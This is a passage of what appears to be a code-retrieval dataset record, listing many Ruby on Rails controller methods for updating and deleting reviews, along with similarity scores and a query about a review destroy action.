"def update\n respond_to do |format|\n if @blade_review.update(blade_review_params)\n format.html { redirect_to blade_reviews_path, notice: 'Blade review was successfully updated.' }\n format.json { render :show, status: :ok, location: @blade_review }\n else\n format.html { render :edit }\n format.json { render json: @blade_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n\t\t# Attempts to update review using user inputs\n\t\tif @review.update(review_params)\n\t\t\t# Once updated, redirected to show page of car\n\t\t\tredirect_to car_path(@car)\n\t\telse\n\t\t\t# If not updated, edit form is loaded once again\n\t\t\trender 'edit'\n\t\tend\n\tend",
"def update\n @review = current_user.reviews.find_by_id(params[:id])\n if @review.nil?\n flash[:notice] = t(:review_not_found)\n return redirect_back_or_default()\n else\n @reviewable = @review.reviewable\n @review.content = params[:review][:content]\n @review.reviewable_id = params[:review][:reviewable_id]\n @review.reviewable_type = params[:review][:reviewable_type]\n end\n\n respond_to do |format|\n #if @review.update_attributes(params[:review])\n if @review.save\n format.html { redirect_to review_path(@review), :notice => t(:review_updated) }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @review = Review.find(params[:id])\n\n if @review.update(review_params)\n head :no_content\n else\n render json: @review.errors, status: :unprocessable_entity\n end\n end",
"def update\n @review = Review.find(params[:id])\n\n if @review.update(review_params)\n head :no_content\n else\n render json: @review.errors, status: :unprocessable_entity\n end\n end",
"def update\n @review = Review.find(params[:id])\n\n if @review.update(review_params)\n head :no_content\n else\n render json: @review.errors, status: :unprocessable_entity\n end\n end",
"def update\n @review = @post.reviews.where(user_id: current_user.id).find(params[:id])\n @review.update_attributes(params[:review])\n respond_with @post, @review, location: post_path(@post, anchor: \"review_#{@review.id}\")\n end",
"def update\n @title = t 'conclusion_draft_review.edit_title'\n\n respond_to do |format|\n if @conclusion_draft_review.update(conclusion_draft_review_params)\n flash.notice = t 'conclusion_draft_review.correctly_updated'\n format.html { redirect_to(edit_conclusion_draft_review_url(@conclusion_draft_review)) }\n else\n format.html { render action: :edit }\n end\n end\n\n rescue ActiveRecord::StaleObjectError\n flash.alert = t 'conclusion_draft_review.stale_object_error'\n redirect_to edit_conclusion_draft_review_url(@conclusion_draft_review)\n end",
"def update\n @post = Post.find(params[:id])\n\n respond_to do |format|\n if @post.update_attributes(params[:post])\n @post.review!\n format.html { redirect_to @post, notice: 'Anúncio atualizado com sucesso.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @item_review.update(item_review_params)\n format.html { redirect_to @item_review, notice: 'Item review was successfully updated.' }\n format.json { render :show, status: :ok, location: @item_review }\n else\n format.html { render :edit }\n format.json { render json: @item_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to_creative :ok, 'Review was successfully updated.', :edit\n end",
"def update\n respond_to do |format|\n if @correction_review.update(correction_review_params)\n format.html { redirect_to @correction_review, notice: 'Correction review was successfully updated.' }\n format.json { render :show, status: :ok, location: @correction_review }\n else\n format.html { render :edit }\n format.json { render json: @correction_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @review = @place.reviews.find(params[:id])\n\n respond_to do |format|\n if @review.update_attributes(params[:review])\n format.html { redirect_to reviews_path, notice: 'Review was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @auditreview.update(auditreview_params)\n format.html { redirect_to action: \"index\", notice: 'Auditreview was successfully updated.' }\n format.json { render :show, status: :ok, location: @auditreview }\n else\n format.html { render :edit }\n format.json { render json: @auditreview.errors, status: :unprocessable_entity }\n end\n end\n end",
"def edit_review\n # client should be able to edit a review.\n puts \"Which review would you like to edit?\"\n pp Client.find_by(name: @@client_name).reviews\n puts \"Please enter the ID\"\n input = gets.strip\n selected_review = Review.find_by(id: input)\n puts \"What would you like for the new review to say?\"\n input = gets.strip\n selected_review.update(text_body: input)\n puts \"Your review has been updated, here's the new review:\"\n pp selected_review\n client_continue\n end",
"def update_review_text(user, game, tracer)\n display_menu_header([\"Update My Review of\", \"'#{game.name}':\"], user)\n entry = display_string_menu([\"Write a new review below and hit 'Enter' to save:\", \"\"], [])\n Review.find_by(user_id: user.id, game_id: game.id).update(review_text: entry)\n display_footer([\"Review text successfully updated for\", \"'#{game.name}'.\"])\n menu_routing(user, game, tracer)\nend",
"def update\n respond_to do |format|\n if @boo_k_review.update(boo_k_review_params)\n format.html { redirect_to @boo_k_review, notice: 'Boo k review was successfully updated.' }\n format.json { render :show, status: :ok, location: @boo_k_review }\n else\n format.html { render :edit }\n format.json { render json: @boo_k_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update_review(user,school) \n# the \"usersreviews\" var iterates through all reviews and returns an array of reviews that match the users ID \n usersreviews = Review.all.select { |review| review.user_id == user.id }\n usersreviews= user.reviews\n#============================================================================================================= \n users_content = usersreviews.each { |review| p \"#{review.content} for #{review.school.name}\" }\n# \"users_content\" var captures a particular users reviews and prints out the content of each review\n#========================================================================================================== \n\n# i then prompt the user to select the content of the review they want to update and have them enter it to search \n#for that review in the database and return it so that it can then be updated\n puts \"Your reviews are listed above please enter the content you would like to update\"\n users_content_choice = gets.chomp\n puts \"please enter your revision\"\n content_to_change = Review.find_by(content:users_content_choice)\n updated_input = gets.chomp\n content_to_change.update(content:updated_input)\n #==================================================================================== \n puts \"Your review has been updated\"\n @prompt.select(\"please select an option to continue or logout\") do |menu|\n menu.choice \"continue\", -> { self.enter_school_name_prmpt }\n menu.choice \"logout\", -> { `open https://www.google.com/` } \n end \n end",
"def update\n\t\t@set_def_avt=params[:review][:default_avatar]\n\t\t@review.cover_page.destroy if @set_def_avt\n\n\t\trespond_to do |format|\n\t\t\tif @review.update(review_params)\n\t\t\t\t@reviews = Review.order(:heading).paginate(page: params[:page], per_page: 18)\n\t\t\t\tformat.html { redirect_to @review; flash[:info]= 'review was successfully updated.' }\n\t\t\t\tformat.json { render :show, status: :ok, location: @review }\n\t\t\t\tformat.js\n\t\t\telse\n\t\t\t\tformat.html { render :edit }\n\t\t\t\tformat.json { render json: @review.errors, status: :unprocessable_entity }\n\t\t\t\tformat.js\n\t\t\tend\n\t\tend\n\tend",
"def update\n respond_to do |format|\n if @admin_nature_of_review.update(admin_nature_of_review_params)\n format.html { redirect_to @admin_nature_of_review, notice: 'Nature of review was successfully updated.' }\n format.json { render :show, status: :ok, location: @admin_nature_of_review }\n else\n format.html { render :edit }\n format.json { render json: @admin_nature_of_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n flash[:success] = \"수정 성공\"\n format.html { redirect_to @review }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @event_review.update(event_review_params)\n format.html { redirect_to @event_review, notice: 'Event review was successfully updated.' }\n format.json { render :show, status: :ok, location: @event_review }\n else\n format.html { render :edit }\n format.json { render json: @event_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @tour_review.update(tour_review_params)\n format.html { redirect_to @tour_review, notice: 'ツアーレビューが正常に更新されました。' }\n format.json { render :show, status: :ok, location: @tour_review }\n else\n format.html { render :edit }\n format.json { render json: @tour_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if (allowAccessIfOwnerNameIsOrRankAtLeast(\"#{@review.poster}\", 1))\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { head :no_content }\n end\n end\n else\n respond_to do |format|\n format.html { render action: 'edit' }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n flash[:notice] = 'You do not have permission to edit this review'\n\n end\n end\n end",
"def update\n respond_to do |format|\n if @visitor_review.update(visitor_review_params)\n format.html { redirect_to @visitor_review, notice: 'Visitor review was successfully updated.' }\n format.json { render :show, status: :ok, location: @visitor_review }\n else\n format.html { render :edit }\n format.json { render json: @visitor_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @thesis_review = ThesisReview.find(params[:id])\n\n respond_to do |format|\n if @thesis_review.update_attributes(params[:thesis_review])\n format.html { redirect_to(@thesis_review, :notice => 'ThesisReview was successfully updated.') }\n format.xml { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @thesis_review.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @reviews_and_rating.update(reviews_and_rating_params)\n format.html { redirect_to @reviews_and_rating, notice: 'Reviews and rating was successfully updated.' }\n format.json { render :show, status: :ok, location: @reviews_and_rating }\n else\n format.html { render :edit }\n format.json { render json: @reviews_and_rating.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @book_review = BookReview.find(params[:id])\n\n respond_to do |format|\n if @book_review.update_attributes(params[:book_review])\n format.html { redirect_to @book_review, notice: 'Book review was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @book_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if @review.update(review_params)\n @boardgame = Boardgame.find(params[:boardgame_id])\n render json: @boardgame, status: :ok\n else\n render json: @review.errors, status: :unprocessable_entity\n end\n end",
"def update_review(movie, status)\n\tcheck = user_already_reviewed(movie)\n\t#if none returns 0\n\tif check == -1\n\t @update_review = 0\n\t#else returns the review id \n\telse\n\t reviewFound = movie.reviews.where('user_id' => current_user.id).first\n\t @update_review = reviewFound.id\n\tend\nend",
"def update\n\t\t@book_review = BookReview.find(params[:id])\n\n\t\trespond_to do |format|\n\t\t\tif @book_review.update_attributes(params[:book_review])\n\t\t\t\tformat.html { redirect_to @book_review, :notice => 'Book review was successfully updated.' }\n\t\t\t\tformat.json { head :ok }\n\t\t\telse\n\t\t\t\tformat.html { render :action => \"edit\" }\n\t\t\t\tformat.json { render :json => @book_review.errors, :status => :unprocessable_entity }\n\t\t\tend\n\t\tend\n\tend",
"def reviewboard_update\n user = User.find(params[:id])\n user.reviewboard = params[:reviewboard]\n user.save\n flash[:alert] = \"The review board status has been updated\"\n redirect_to admin_user_admins_path\n end",
"def update\n respond_to do |format|\n if @bizowners_review.update(bizowners_review_params)\n format.html { redirect_to @bizowners_review, notice: 'Bizowners review was successfully updated.' }\n format.json { render :show, status: :ok, location: @bizowners_review }\n else\n format.html { render :edit }\n format.json { render json: @bizowners_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update_review_status_if_changes_substantial\n return unless @description.save_version?\n\n @description.update_review_status(@description.review_status)\n end",
"def update\n @review = Review.find(params[:id])\n @review.update(review_params)\n render json: @review\n end",
"def update\n @comment = Comment.find(params[:id])\n @repbody = Repbody.find(params[:repbody_id])\n @update = Update.new\n @current = Time.now\n @comment.date = @current.strftime('%Y-%m-%d %H:%M:%S')\n respond_to do |format|\n if @comment.update_attributes(comment_params)\n @update.date = @current.strftime('%Y-%m-%d %H:%M:%S')\n @update.comment = \"コメント更新 [#{@current_user.username}] \"\n @update.repbody_id = @repbody.id\n @update.save\n if params[:revised] == '1'\n Repbody.where(:id => @update.repbody_id).update_all(:fix => 'f')\n else\n Repbody.where(:id => @update.repbody_id).update_all(:fix => 't')\n end\n format.html { redirect_to user_repbody_path(@repbody.user_id, @repbody.id), :notice => '【メッセージ】コメントは正しく更新されました.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @comment.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if @review.update(review_params)\n render json: @review\n else\n render json: @review.errors, status: :unprocessable_entity\n end\nend",
"def update\n respond_to do |format|\n if @product_review.update(product_review_params)\n format.html { redirect_to @product_review, notice: 'Product review was successfully updated.' }\n format.json { render :show, status: :ok, location: @product_review }\n else\n format.html { render :edit }\n format.json { render json: @product_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @fourth_review.update(fourth_review_params)\n format.html { redirect_to team_path(@fourth_review.team_id), notice: 'Fourth review was successfully updated.' }\n format.json { render :show, status: :ok, location: @fourth_review }\n else\n format.html { render :edit }\n format.json { render json: @fourth_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @peer_review.update(peer_review_params)\n format.html { redirect_to @peer_review, notice: 'Peer review was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @peer_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @food_review.update(food_review_params)\n format.html { redirect_to @food_review, notice: 'Food review was successfully updated.' }\n format.json { render :show, status: :ok, location: @food_review }\n else\n format.html { render :edit }\n format.json { render json: @food_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @restaurant_review.update(restaurant_review_params)\n format.html { redirect_to @restaurant_review, notice: 'Restaurant review was successfully updated.' }\n format.json { render :show, status: :ok, location: @restaurant_review }\n else\n format.html { render :edit }\n format.json { render json: @restaurant_review.errors, status: :unprocessable_entity }\n end\n end\n end"
] |
[
"0.79077613",
"0.7738259",
"0.76770145",
"0.7647901",
"0.7647381",
"0.75905484",
"0.7584547",
"0.75218093",
"0.74996525",
"0.74972767",
"0.74942213",
"0.74378693",
"0.74378693",
"0.74378693",
"0.7428504",
"0.7428504",
"0.7428504",
"0.7428504",
"0.7428504",
"0.7428504",
"0.7428504",
"0.7422253",
"0.742138",
"0.7400981",
"0.73992604",
"0.7380647",
"0.73788726",
"0.73703265",
"0.7366873",
"0.7366873",
"0.7366873",
"0.7366873",
"0.73434585",
"0.7338962",
"0.7338261",
"0.7326509",
"0.7325427",
"0.73197025",
"0.7307375",
"0.7300721",
"0.72958744",
"0.72940046",
"0.7284665",
"0.728409",
"0.72682333",
"0.7232399",
"0.7227717",
"0.7226365",
"0.7220432",
"0.72147256",
"0.72145885",
"0.7213411",
"0.7208314",
"0.7201438",
"0.71999687",
"0.71893704",
"0.7186311",
"0.7180414",
"0.71759874",
"0.7164904",
"0.71635634",
"0.7156634",
"0.7156634",
"0.7156634",
"0.7150131",
"0.7137036",
"0.7131332",
"0.71306264",
"0.7129282",
"0.71221167",
"0.7069495",
"0.70674497",
"0.7056891",
"0.7045524",
"0.7032392",
"0.70304704",
"0.70243496",
"0.7005989",
"0.69930464",
"0.69821584",
"0.6959596",
"0.69552886",
"0.6945294",
"0.6937124",
"0.6930283",
"0.69225675",
"0.6909407",
"0.6907614",
"0.68925047",
"0.68720716",
"0.68563545",
"0.6814185",
"0.67960835",
"0.67958415",
"0.67943484",
"0.6787407",
"0.6769511",
"0.67282975",
"0.6724606",
"0.67083263"
] |
0.7721352
|
2
|
destroy method takes care of deleting a review
|
def destroy
@review = Review.find(params[:id])
@review.destroy
redirect_to share_reviews_path(@share), notice: "Review successfully deleted!"
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def destroy\n @review.destroy\n end",
"def destroy\n @review = find_review\n @review.destroy\n redirect_to reviews_path\n end",
"def destroy\n @review.destroy\n\n head :no_content\n end",
"def destroy\n @review.destroy\n\n head :no_content\n end",
"def destroy\n @review.destroy\n\n head :no_content\n end",
"def destroy\n @review.destroy\n redirect_to root_url\n end",
"def destroy\n\t\t@review.destroy\n\t\tredirect_to admins_path\n\tend",
"def destroy\n\t\t\t\tDriverReview.destroy(current_review)\n\t\t\t\trender_success\n\t\t\tend",
"def destroy\n\t\t@review = Review.find(params[:id])\n\t\t@review.destroy\n\n\t\trespond_to do |format|\n\t\t\tformat.html { redirect_to(reviews_url) }\n\t\t\tformat.xml { head :ok }\n\t\tend\n\tend",
"def destroy\n @review = Review.find(params[:id])\n @review.destroy\n flash[:notice] = \"This review was successfully deleted!\"\n redirect_to root_path\n end",
"def destroy\n @review = Review.find params[:id]\n @review.destroy\n redirect_to :back\n end",
"def destroy\n @review.destroy\n flash[:success] = 'レビューを削除しました。'\n redirect_back(fallback_location: root_path)\n end",
"def destroy\n @review.destroy\n @apn.update_attribute(:reviewed, false)\n flash[:notice] = \"Review was destroyed\"\n redirect_to root_path\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to reviews_url, notice: \"振り返りを削除しました。\" }\n format.json { head :no_content }\n end\n end",
"def destroy\n\t\t@review.destroy\n\t\tredirect_to car_path(@car)\n\tend",
"def destroy\n @review = Review.find(params[:id])\n @review.destroy\n\n respond_to do |format|\n format.html { redirect_to(reviews_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @review = Review.find(params[:id])\n @review.destroy\n\n respond_to do |format|\n format.html { redirect_to(reviews_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @review = Review.find(params[:id])\n @review.destroy\n respond_to do |format|\n format.html { redirect_to @review.lecture, notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review = Review.find(params[:id])\n @review.destroy\n\n respond_to do |format|\n format.html { redirect_to(review_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n Review.destory(params[:id])\nend",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to publication_reviews_url, notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review = reviewable.reviews.find(params[:id])\n @review.destroy\n\n respond_to do |format|\n format.html { redirect_to reviewable_reviews_url(reviewable) }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review = Review.find(params[:id])\n @review.destroy\n\n respond_to do |format|\n format.html { redirect_to reviews_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to reviews_url, notice: \"レビューが削除されました\" }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to reviews_url, notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to reviews_url, notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to reviews_url, notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to reviews_url, notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to reviews_url, notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to reviews_url, notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to reviews_url, notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to reviews_url, notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def delete_user\n delete_reviews(self)\n self.destroy\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.json { head :no_content }\n end\n end",
"def destroy\n @review = Review.find(params[:id])\n @review.destroy\n\n respond_to do |format|\n format.html { redirect_to reviews_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review = Review.find(params[:id])\n @review.destroy\n\n respond_to do |format|\n format.html { redirect_to reviews_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review = Review.find(params[:id])\n @review.destroy\n\n respond_to do |format|\n format.html { redirect_to reviews_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review = Review.find(params[:id])\n @review.destroy\n\n respond_to do |format|\n format.html { redirect_to reviews_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review = Review.find(params[:id])\n @review.destroy\n\n respond_to do |format|\n format.html { redirect_to reviews_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to reviews_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to reviews_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to reviews_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review = @post.reviews.where(user_id: current_user.id).find(params[:id])\n @review.destroy\n respond_with @post, @review, location: post_path(@post, anchor: \"reviews\")\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to places_url, notice: 'Review was successfully destroyed.' }\n end\n end",
"def destroy\n @critic_review.destroy\n respond_to do |format|\n format.html { redirect_to critic_reviews_url, notice: 'Critic review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to dashboard_show_path, notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n #If destroyed, it display the notice.\n format.html { redirect_to reviews_url, notice: t('review.destroy') }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to project_path(@project), notice: 'Review was successfully deleted.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n\t\t@review.destroy\n\t\trespond_to do |format|\n\t\t\tformat.html { redirect_to reviews_url, notice: 'Review was successfully destroyed.' }\n\t\t\tformat.json { head :no_content }\n\t\t\tformat.js\n\t\tend\n\tend",
"def destroy\n @story = @review.story\n @review.destroy\n redirect_to story_url(@story), notice: 'Review was successfully destroyed.'\n end",
"def destroy\n unless current_user.is_review_moderator?\n redirect_to denied_path\n return\n end\n\n @review = Review.find(params[:id])\n @review.destroy\n\n respond_to do |format|\n format.html { redirect_to(reviews_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n # Broadcast remove review on list from model.\n format.turbo_stream { render turbo_stream: \"\" }\n format.html { redirect_to recipe_path(@recipe, anchor: \"reviews_header\"), notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to restaurent_path(@restaurent.id),\n notice: \"Review was successfully destroyed\" }\n format.json { head :no_content }\n end\n end",
"def destroy\n authorize! :destroy, ReviewsController\n @review = Review.find(params[:id])\n if @review\n @review.destroy\n flash[:success] = 'Запись была успешно удалена!'\n else\n flash[:error] = 'Запись не найдена.'\n end\n\n respond_to do |format|\n format.html { redirect_to reviews_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review = @place.reviews.find(params[:id])\n @review.destroy\n\n respond_to do |format|\n format.html { redirect_to reviews_url, notice: 'Review was successfully removed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n temp_id = @review.user_id\n Review.find(params[:id]).destroy\n flash[:success] = \"Review Deleted\"\n redirect_to user_path(temp_id)\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to categories_url, notice: 'レビューの削除完了です!' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review = Product.find(params[:product_id]).reviews.find(params[:id])\n @review.destroy\n redirect_to :back\n end",
"def destroy\n @hm_review.destroy\n respond_to do |format|\n format.html { redirect_to hm_reviews_url, notice: 'Hm review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review = Review.find(params[:id]) # param comes from route\n @review.destroy\n\n redirect_to restaurant_path(@restaurant.id)\n end",
"def destroy\n @review = Review.find(params[:id])\n @review.destroy\n\n respond_to do |format|\n format.html { redirect_to :back }\n format.json { head :no_content }\n end\n end",
"def destroy\n prof_id = @review.professor_id\n @review.destroy\n respond_to do |format|\n format.html do\n redirect_to professor_path(prof_id),\n notice: 'Review was successfully destroyed.'\n end\n format.json { head :no_content }\n end\n end",
"def destroy\n @user = current_user\n @review = Review.find(params[:id]).delete\n render json: { msg: \"Delete Successful\" }\n end",
"def destroy\n @admin_review.destroy\n respond_to do |format|\n format.html { redirect_to admin_reviews_url, notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to :back }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n @reservation.reviwed = false\n @reservation.save\n format.html { redirect_to listings_url, notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to @book, notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @auditreview.destroy\n respond_to do |format|\n format.html { redirect_to auditreviews_url, notice: 'Auditreview was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n if (allowAccessIfOwnerNameIsOrRankAtLeast(\"#{@review.poster}\", 1))\n @review.destroy\n respond_to do |format|\n format.html { redirect_to reviews_url }\n format.json { head :no_content }\n end\n else\n respond_to do |format|\n format.html { redirect_to reviews_url }\n format.json { head :no_content }\n flash[:notice] = 'You do not have permission to delete this review'\n end\n end\n end",
"def destroy\n @user_review = UserReview.find(params[:id])\n @user_review.destroy\n\n respond_to do |format|\n format.html { redirect_to(user_reviews_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @product = Product.find_by(id: params[:product_id])\n @review = Review.find_by(id: params[:id])\n @review.destroy\n\n redirect_to @product, notice: 'Review Deleted'\n end",
"def destroy\n\t\t@book_review = BookReview.find(params[:id])\n\t\t@book_review.destroy\n\n\t\trespond_to do |format|\n\t\t\tformat.html { redirect_to book_reviews_url }\n\t\t\tformat.json { head :ok }\n\t\tend\n\tend",
"def destroy\n @correction_review.destroy\n respond_to do |format|\n format.html { redirect_to correction_reviews_url, notice: 'Correction review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @fourth_review.destroy\n respond_to do |format|\n format.html { redirect_to fourth_reviews_url, notice: 'Fourth review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @product = Product.find(@product_review.product_id)\n @product_review.destroy\n\n redirect_to product_path(@product.id, notice: 'Product review was successfully destroyed.')\n end",
"def destroy\n if user_signed_in? && current_user.admin?\n @new_review = NewReview.find(params[:id])\n @new_review.destroy\n\n respond_to do |format|\n format.html { redirect_to new_reviews_url }\n format.json { head :no_content }\n end\n else\n redirect_to root_path\n end\n end",
"def destroy\n #find the individual review\n @review = Review.find(params[:id])\n # check if user is current poster\n if @review.user == @current_user\n #destroy it\n @review.destroy\n end\n\n #redirect to the homepage\n redirect_to root_path\n end",
"def destroy\n @user_review.destroy\n respond_to do |format|\n format.html { redirect_to user_reviews_url, notice: 'User review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @visitor_review.destroy\n respond_to do |format|\n format.html { redirect_to visitor_reviews_url, notice: 'Visitor review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n\n @product = Product.find(params[:product_id])\n @revoew = @product.reviews.find(params[:id])\n @review.destroy\n\n redirect_to product_path(@product)\n\n end",
"def destroy\n review = Review.find_by(id: params[:id]).destroy\n render json: review\n end",
"def destroy\n @restaurant_review.destroy\n respond_to do |format|\n format.html { redirect_to restaurant_reviews_url, notice: 'Restaurant review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @boo_k_review.destroy\n respond_to do |format|\n format.html { redirect_to boo_k_reviews_url, notice: 'Boo k review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @professor_review = ProfessorReview.find(params[:id])\n @professor_review.destroy\n\n respond_to do |format|\n format.html { redirect_to(professor_reviews_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @blade_review.destroy\n respond_to do |format|\n format.html { redirect_to blade_reviews_url, notice: 'Blade review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @tour_review.destroy\n respond_to do |format|\n format.html { redirect_to tour_reviews_url, notice: 'ツアーレビューは正常に削除されました。' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @hospital = Hospital.find(params[:hospital_id])\n @review = @hospital.reviews.find(params[:id])\n @review.destroy\n respond_to do |format|\n flash[:success] = \"삭제 성공\"\n format.html { redirect_to @hospital }\n format.json { head :no_content }\n end\n end",
"def destroy\n @admin_nature_of_review.destroy\n respond_to do |format|\n format.html { redirect_to admin_nature_of_reviews_url, notice: 'Nature of review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @item_review.destroy\n respond_to do |format|\n format.html { redirect_to item_reviews_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @pre_training_review.destroy\n respond_to do |format|\n format.html { redirect_to pre_training_reviews_url, notice: 'Pre training review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @first_review.destroy\n respond_to do |format|\n format.html { redirect_to first_reviews_url, notice: 'First review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @book_review = BookReview.find(params[:id])\n @book_review.destroy\n\n respond_to do |format|\n format.html { redirect_to book_reviews_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @reviews_and_rating.destroy\n respond_to do |format|\n format.html { redirect_to reviews_and_ratings_url, notice: 'Reviews and rating was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @item_review.destroy\n respond_to do |format|\n format.html { redirect_to item_reviews_url, notice: 'Item review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @food_review.destroy\n respond_to do |format|\n format.html { redirect_to food_reviews_url, notice: 'Food review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
